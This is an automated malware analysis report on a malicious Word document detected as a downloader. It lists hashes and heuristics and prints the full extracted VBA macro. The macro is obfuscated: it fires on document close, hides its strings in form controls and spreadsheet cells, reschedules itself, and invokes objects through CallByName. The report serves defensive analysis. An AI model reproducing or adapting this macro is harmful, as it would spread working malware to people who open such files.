Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 db7e6dd41bfc0093…

MALICIOUS

Office (OOXML)

Size: 83.3 KB | Created: 2021-01-29 09:43:00 UTC | Authoring application: Microsoft Office Word 16.0000 | First seen: 2021-02-09
MD5: 32b9c0d48b08f533a81e1e76e6c34aed
SHA-1: 31767d3887a68ffd5a037db022758002a7cac50b
SHA-256: db7e6dd41bfc009321cc191be5f0f9b573b1c0ba4677f5dfa7b045c7f2b78ed9
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML [medium, 2 related findings] (OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set ep = CreateObject(UserForm1.af & UserForm1.hd)
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    Matched line in script:
    Set vl = CallByName(ep.Workbooks, UserForm1.gf & UserForm1.sr, 1, UserForm2.ComboBox1, , , , UserForm1.qt)
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following URLs were found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7010 bytes
SHA-256: 95ea3357ed425a497b2c51740fa9495ea32fc75d79dde845fae0df628198e2ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public ixv, zb2, x, d9, qj, ep, ef, nol, j8, ah, pb, am, b3t, hz, jw, f8

Sub Document_Close()

ol

End Sub

Sub ol()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set ep = CreateObject(UserForm1.af & UserForm1.hd)

k6 = UserForm2.ComboBox4

ep.DisplayAlerts = False

ag = UserForm2.ComboBox23

b4 = 1301

n9 = 0

Err.Number = 0

ab = UserForm2.ComboBox5

While b4 <> 0 And n9 < 32

Set vl = CallByName(ep.Workbooks, UserForm1.gf & UserForm1.sr, 1, UserForm2.ComboBox1, , , , UserForm1.qt)

b4 = Err.Number

n9 = n9 + 16

Wend

If b4 <> 0 Then

ErrHandler:

gyt = CallByName(Application, UserForm1.py & UserForm1.po, 2)

wg = UserForm2.ComboBox26

If gyt <> False Then

qu = UserForm2.ComboBox24

Set o2 = CreateObject(UserForm1.bh & UserForm1.k0)

CallByName o2.Documents, UserForm1.gf & UserForm1.sr, 1, ActiveDocument.FullName, , True

CallByName o2, UserForm1.o & UserForm1.uax, 1, Now + TimeSerial(0, 0, 2), UserForm1.ma0 & UserForm1.g4 & "ol"

Else

usp = UserForm2.ComboBox19

CallByName Application, UserForm1.o & UserForm1.uax, 1, Now + TimeSerial(0, 0, 17), UserForm1.ma0 & UserForm1.g4 & "ol"

End If

ep.Quit

Exit Sub

End If

Dim l1

Set l1 = ep.sheets(1)

ey = UserForm2.ComboBox12

rx = "'"

f8 = ep.sheets(5).Cells(1, 1)

If Len(f8) < 1 Then

If ep.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

zbl = ep.sheets(1).Cells(113, 43).Value

hs = ep.sheets(1).Cells(59, 49).Value

ah = ep.sheets(1).Cells(135, 11).Value

a = UserForm2.ComboBox28

pb = ep.sheets(2).Cells(74, 25).Value

qj = ep.sheets(2).Cells(76, 31).Value

p2 = ep.sheets(2).Cells(109, 55).Value

yl = l1.Cells(143, 33).Value

cd = ep.sheets(3).Cells(113, 1).Value

yfe = ep.sheets(2).Cells(143, 20).Value

eu = UserForm2.ComboBox7

ne = ep.sheets(1).Cells(29, 52).Value

b3t = ep.sheets(2).Cells(97, 37).Value

ef = l1.Cells(109, 14).Value

j8 = ep.sheets(3).Cells(130, 46).Value

nqr = ep.sheets(3).Cells(1, 60).Value

t8v = ep.sheets(2).Cells(131, 40).Value

am = l1.Cells(109, 52).Value

gh = UserForm2.ComboBox20

rn = ep.sheets(1).Cells(94, 10).Value

zx = ep.sheets(2).Cells(143, 55).Value

ixv = ep.sheets(3).Cells(97, 25).Value

tb = ep.sheets(3).Cells(42, 52).Value

mc = l1.Cells(65, 24).Value

nol = ep.sheets(3).Cells(22, 10).Value

lfw = UserForm2.ComboBox25

zb2 = ep.sheets(3).Cells(6, 5).Value

pj = ep.sheets(3).Cells(8, 6).Value

a2 = ep.sheets(2).Cells(41, 32).Value

jw = ""

Set Sh1 = ep.sheets(4)

g6 = 1

a0 = True

While a0

px = Sh1.Cells(g6, 1).Value

If Len(px) < 1 Then

a0 = False

Else

jw = jw & px

End If

g6 = g6 + 1

Wend

pc = CallByName(ep, ne, 2)

na = UserForm2.ComboBox22

mv = UserForm2.ComboBox27

UserForm1.n57.Value = yl & pc & zx

m9 = UserForm2.ComboBox10

UserForm1.d4.Value = hs

CallByName CreateObject(a2), mc, 1, UserForm1.n57, rn, UserForm1.d4

Set kz = CreateObject(zbl)

Set l5s = CallByName(kz, p2, 2)

Set de = CallByName(l5s, pj, 1)

Set j8 = CallByName(kz, j8, 2)

kt = UserForm2.ComboBox24

Set d9 = kz

UserForm5.ComboBox1 = "yt"

Set ixv = CallByName(hz, ixv, 2)

nol = CallByName(ixv, nol, 2)

UserForm1.hi.Value = tb & cd

UserForm3.ComboBox1 = yfe

ih = UserForm2.ComboBox3

UserForm1.hi.Value = nqr

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = nol

kz = ik

ja = UserForm2.ComboBox16

vl = tz

l1 = xdy

l5s = h2

de = jv

j8 = E

ah = xh

pb = dn

hz = fw

ixv = ix

qc = UserForm2.ComboBox5

d9 = j3

ce = UserForm2.ComboBox13

DoEvents

CallByName ep, t8v, 1

ep = m53

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D2E872CE-D407-4A02-907B-8D1E0C8C82BC}{6D68C8CF-13A1-46B9-B464-81B7A2FD17FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{B301D62D-6D72-4CFA-8F72-8791F68EF30C}{E616241E-D4D3-4E47-B115-DC37E0CF2B4E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 dk6 = UserForm2.Controls.Count - 1
 
 
 
 

 db = ""
 For r4 = 1 To dk6 Step 2
 db = db & UserForm2.Controls.Item(r4)
 Next

xny = UserForm2.ComboBox9


 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"

b8 = UserForm2.ComboBox27

 ComboBox1.AddItem db

o1 = UserForm2.ComboBox4

 ComboBox1.AddItem "gz"
 
 
 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{D4B047ED-3B5E-42EF-A959-87E5F1A44114}{ED8F5FC5-0B66-4F08-9167-0637296C7FFF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ixv, ActiveDocument.ef, VbMethod, 1, ActiveDocument.nol

gq = UserForm2.ComboBox13

 CallByName ActiveDocument.ixv, ActiveDocument.zb2, VbMethod, UserForm1.hi.Value

kd = UserForm2.ComboBox16

End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{7EA69B8C-04EE-4DD6-A709-9AEFAE627512}{81F39DE9-C4B4-42DA-A52E-A3E6B14D2AEA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.d9, ActiveDocument.qj, VbMethod, UserForm1.hi.Value, ActiveDocument.jw, ActiveDocument.f8
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{9B38F8C6-80C0-4608-A826-6AFBEDE29EC4}{3EA54114-A409-48E1-A094-4FAB5285E53E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.ah = CallByName(ActiveDocument.j8, ActiveDocument.ah, VbGet)
 Set ActiveDocument.pb = CallByName(ActiveDocument.ah, ActiveDocument.pb, VbGet)
 Set ActiveDocument.hz = CallByName(ActiveDocument.pb, ActiveDocument.am, VbMethod, ActiveDocument.b3t)
End Sub

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 50688 bytes
SHA-256: a08112b5b8f295475353253837e330b35511622ec1949a71c37817eeefd5aebf
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely